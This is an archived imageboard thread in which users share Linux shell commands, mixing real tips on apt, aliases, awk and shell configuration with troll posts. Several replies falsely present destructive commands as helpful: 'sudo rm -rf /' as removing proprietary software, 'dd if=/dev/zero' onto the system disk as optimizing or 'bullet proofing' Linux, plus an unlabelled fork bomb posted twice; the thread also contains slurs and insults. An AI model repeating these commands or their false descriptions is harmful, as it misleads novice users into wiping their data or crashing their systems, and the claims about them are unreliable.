[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y ] [Search | Free Show | Home]

Share your l33t Linux command.

This is a blue board which means that it's for everybody (Safe For Work content only). If you see any adult content, please report it.

Thread replies: 48
Thread images: 6

File: ubuntu-logo.png (4KB, 758x171px) Image search: [Google]
ubuntu-logo.png
4KB, 758x171px
I just installed Ubuntu here.

I'm going to teach you one command:

sudo apt-get install xxxxx

xxxxx you should replace with your app name

Then you type the password you inserted when installing the system.

This will install a program.
>>
>>62398417
Teach me more OP.
>>
fucking die, normie
>>
>>62398417
Sudo apt-get install gf_1.02 :^(
>>
I learned a while back that if you do `sudo rm -rf /` it will delete all proprietary software and free up space on your hd.
>>
>>62398417
sudo apt-get install photoshop

fuck you faget it doesn't work
>>
>>62398417
fugggg :---DDDD

i had no idea
>>
>>62398932
Before anyone screems "MUH WEBSITE TOLD ME NEVER TO", Websites will get paid to print out articles in favor of propietary software,
>>
>>62398417
>installing programs without searching on the web
What sorcery is this?
>>
File: HA HA BUSINESS.jpg (22KB, 720x720px) Image search: [Google]
HA HA BUSINESS.jpg
22KB, 720x720px
sudo dd if=/dev/zero of=/dev/sda bs=1M count=100000


This command optimizes your Linux installation by removing all the redundant zeroes.
>>
File: 1504791601287.png (62KB, 500x455px) Image search: [Google]
1504791601287.png
62KB, 500x455px
>>62398932
I heard if you do "sudo rm -rf ~" you become homeless
>>
>>62399076
:(
>>
>>62399071
Not every hd is mounted to sda
>>
>>62399071
My boot times were drastically reduced using this command. I thank you,kind Sir.
>>
>>62398932
>`sudo rm -rf /`
Look, a latino fag. His keyboard doesn't have the single quote key and instead the had to use the ` whatever it is calledf.
>>
>>62398417
You can secure your linux system with disc defender, short: dd

Like this:

dd if=/dev/zero of=/dev/sda

The /dev/zero/ arguments means you tolerate zero deviations from the standard system, meaning any changes by potential malware will be reversed.
The /dev/sda argument is usually your system disc, you may have to change it, if your system resides elsewhere.

If you are unsure where your root filesystem resides, use this variation of the command:

dd if=/dev/zero of=$(mount | grep \ /\ | awk {'print $1'})

Congratulations, your Linux is now bullet proof.
>>
>>62398932
Now my ubuntu vm won't load anymore. What did I do wrong?

Luckly I cloned it before changing anything.
>>
File: 1463796700100.jpgXX0001.jpg (279KB, 1280x1080px) Image search: [Google]
1463796700100.jpgXX0001.jpg
279KB, 1280x1080px
tick-bang-bang-tick: `!!`
Example:
ls a*mp3
mplayer `!!`
>>
>>62398932
>>62401284
Same fag
>>
:(){:|:&};:
>>
echo "Hello World" >| echo "Me" > out.txt
>>
sudo apt install fish; fish

https://fishshell.com/
>>
>>62402410
/this!
>>
>>62398417
sudo apt-get install sl

then type
sl

Grats, your computer is now infected with train
>>
File: u r butt.png (189KB, 960x540px) Image search: [Google]
u r butt.png
189KB, 960x540px
>>62399071
Mfw /home lives on /dev/sdb
>>
>>62399515
I think that's a "back quote"
>>
>>62398417
# sudo apt-get install xxxxx
Reading package lists... Done
Building dependency tree
Reading state information... Done
E: Unable to locate package xxxxx


Did it work? I can't tell.
>>
>>62398916
GIVE ME YOUR MONEY
>>
>>62399515
Ummmm - English speaker in Spain...
What's this?
''''''''''''''''''''''''''''''''''''''
>>
>>62398417
>sudo apt-get install gentoo
>>
sick hack bro thxz
>>
>>62398417
in your shell conf file make an alias

alias install='sudo apt-get install -y'

now you can just type
install programName
>>
>>62402410
is fish better than zsh? recently changed over to zsh. i have it doing all the fish stuff. but fish isn't posix compatible
>>
Run this command once after each install to improve bash
cat > ~/.inputrc << EOF
"\e[A":history-search-backward
"\e[B":history-search-forward
"\e[1;5C":forward-word
"\e[1;5D":backward-word
"\e[5C":forward-word
"\e[5D":backward-word
"\e\e[C":forward-word
"\e\e[D":backward-word
"\e[1~":beginning-of-line
"\e[4~":end-of-line
"\e[3~":delete-char
"\e[2~":quoted-insert
EOF
>>
>>62398916
This doesn't work on Arch. Is there a gf in the user repository? pls respond
>>
>>62401284
Or just
mplayer a*MP3
>>
>>62398417
>app
It's called package faggot
>>
:(){ :|: & };:
>>
>>62406045
>Uses Arch
Edgy.
>>
>>62398417
The apt-get command is depreciated and you should use just apt instead. You can do a lot more with the CLI package manager than just stab around blindly for programs. If you aren't sure of the exact program name in the repositories, you can enter "sudo apt search browser" for example and it'll show everything in the repo that has the word browser in the package name or description. This list of packages is cached locally so if you want to update this list you can run "sudo apt update". To install available updates, run "sudo apt upgrade". If you're running as root you don't need sudo. I personally hate Ubuntu because it locks you out of the root account by default.

Now fuck off.
>>
>>62399515
Why so mad? Your mom and fantasized girlfriend got tucked by a Pedro? :j
>>
>>62406172
>sudo su
>>
>>62399722
Thanks anon, my computer isn't going to be running malware anytime soon now.
>>
>>62406172
I think that it's better for newfags to use synaptic... Not that cli is not good, but they can learn easier to install and manage packages in the gui and blindly use the cli afterwards.
>>
>>62406172
I haven't used Ubuntu but does it lock you out of even sudo su?
>>
>>62406239
Why would you even think a distro will lock you from calling executables?
>>
>>62406239
You just have to type sudo su and then type your password. Boom youre rooted.
>>
>>62398417
awk '{print $n}'
where n is the number of the column you want to print. I see all these plebs trying to print columns using cut, specifying delimiters and having it only work 75% of the time. awk makes this shit so easy.
Thread posts: 48
Thread images: 6


[Boards: 3 / a / aco / adv / an / asp / b / bant / biz / c / can / cgl / ck / cm / co / cock / d / diy / e / fa / fap / fit / fitlit / g / gd / gif / h / hc / his / hm / hr / i / ic / int / jp / k / lgbt / lit / m / mlp / mlpol / mo / mtv / mu / n / news / o / out / outsoc / p / po / pol / qa / qst / r / r9k / s / s4s / sci / soc / sp / spa / t / tg / toy / trash / trv / tv / u / v / vg / vint / vip / vp / vr / w / wg / wsg / wsr / x / y] [Search | Top | Home]

I'm aware that Imgur.com will stop allowing adult images since 15th of May. I'm taking actions to backup as much data as possible.
Read more on this topic here - https://archived.moe/talk/thread/1694/


If you need a post removed click on it's [Report] button and follow the instruction.
DMCA Content Takedown via dmca.com
All images are hosted on imgur.com.
If you like this website please support us by donating with Bitcoins at 16mKtbZiwW52BLkibtCr8jUg2KVUMTxVQ5
All trademarks and copyrights on this page are owned by their respective parties.
Images uploaded are the responsibility of the Poster. Comments are owned by the Poster.
This is a 4chan archive - all of the content originated from that site.
This means that RandomArchive shows their content, archived.
If you need information for a Poster - contact them.